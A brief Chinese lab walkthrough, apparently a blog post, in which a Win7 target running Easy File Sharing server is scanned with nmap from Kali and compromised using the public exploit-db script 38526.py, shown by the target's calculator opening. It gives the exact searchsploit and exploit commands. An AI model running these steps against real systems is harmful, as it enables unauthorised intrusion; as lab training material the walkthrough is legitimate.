1.win7靶机安装easy file sharing server
打开easy file sharing server
将port改为8000,然后点击restart。
2.在kali机上用nmap扫描主机
可以看见主机开启了easy file sharing 服务
3.搜索可利用的漏洞
searchsploit Easy File Sharing Web Server
可以看见有很多可利用的脚本。我们挑选38526.py
4.利用漏洞脚本
python /usr/share/exploitdb/exploits/windows/remote/38526.py 192.168.126.132 8000
最后成功打开主机的计算机。
欢迎分享,转载请注明来源:内存溢出
微信扫一扫
支付宝扫一扫
评论列表(0条)